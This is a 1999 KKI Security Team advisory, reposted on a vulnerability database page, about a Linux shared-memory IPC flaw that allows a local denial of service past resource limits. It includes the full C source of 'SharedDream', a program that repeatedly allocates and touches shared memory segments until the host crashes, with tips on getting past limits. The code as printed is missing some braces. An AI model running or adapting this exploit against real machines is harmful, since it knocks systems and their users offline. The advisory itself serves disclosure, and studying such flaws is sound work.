Lucene search
K

shared_mem_DoS.txt

🗓️ 19 Sep 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

Shared memory IPC vulnerability on Linux allows Denial of Service despite limits.

Code
`Subject: KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability  
To: [email protected]   
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
  
  
### ### ### ### ###  
### ### ### ### ###  
###### ###### ###  
### ### ### ### ###  
### ### ### ### ###  
  
  
S E C U R I T Y  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
KKI Security Team Cracow Commercial Internet  
http://www.security.kki.pl http://www.kki.pl  
mailto:[email protected] mailto:[email protected]  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
Raport title : Shared Memory DoS - IPC vulnerability (Linux  
abuse as example)  
Problem found by : Robert Pajak ([email protected]),  
probably other ppl found that first - one of them is  
lcamtuf, Solar Designer is probably other...  
Raport created by : Robert Pajak ([email protected])  
Lukasz Luzar ([email protected])  
Raport published : 14 September, 1999  
Raport code : KKIS.14091999.004.b  
Vulnerable programs : system vulnerability...  
Systems affected : Linux, other (?) ...  
Archive : http://www.security.kki.pl/advisories/  
Risk level : high  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
Useing attached program one can DoS machine even when limits are set  
up...  
This is due to fact that shared memory segments can exist without  
beeing bind with processes. To protect you should diable this  
operations, or use Solar Designer's stack patch with limits set,  
etc...  
  
  
Alan Cox has been notified...  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
Local Denial of Services attack - simple bypassing limits...  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
  
  
/* SharedDream - (c) Shadow, KKI Security */  
/* */  
/* I'm not responsible for any damaged done by this proggie... */  
/* It should be used only for education... */  
/* To protect - use brain, Solar's patches, or whatever... */  
/* This problem is because shared memory segments can exist even */  
/* if they are not combined with programs! */  
/* !This program will crash your machine (localy) at kernels 2.x! */  
/* If you are on kernels 2.2.x with limits run it twice :) */  
/* really - even when rescource limits are set! :) */  
/* Probably original idea by lcamtuf */  
/* heck you should told me that you found it */  
/* first ;) */  
/* heh - worm greetings for for Coding Style ;) */  
  
  
#include <stdio.h>  
#include <sys/types.h>  
#include <sys/ipc.h>  
#include <sys/shm.h>  
  
  
  
#define BOLD "\033[00;04m"  
#define BLUE "\033[00;36m"  
#define STAN "\033[00;00m"  
  
  
void main(void)  
{  
char *p;  
int i = 10000000;  
  
  
  
printf("\n\n");  
printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments  
abuser\n");  
printf(BOLD "*)\n" STAN);  
printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD  
"[email protected]" STAN ")\n");  
printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me),  
lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i  
forgot to mention\n" STAN);  
printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to  
be limited\n");  
printf(BOLD "*)" STAN " Starting...");  
fflush(stdout);  
  
  
while (1)  
  
  
if (p = shmat(shmget(0, i, 0777), 0, 0))  
  
  
memset( p,'\0',i); // need to touch  
memory somehow  
printf(".DoW.");  
fflush(stdout);  
}  
else {  
i--;  
}  
}  
exit(0);  
}  
  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright  
statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Copyright (c) 1999 KKI Security Team, Poland  
All rights reserved.  
  
  
All questions please address to mailto:[email protected]  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Sep 1999 00:00Current
7.4High risk
Vulners AI Score7.4
50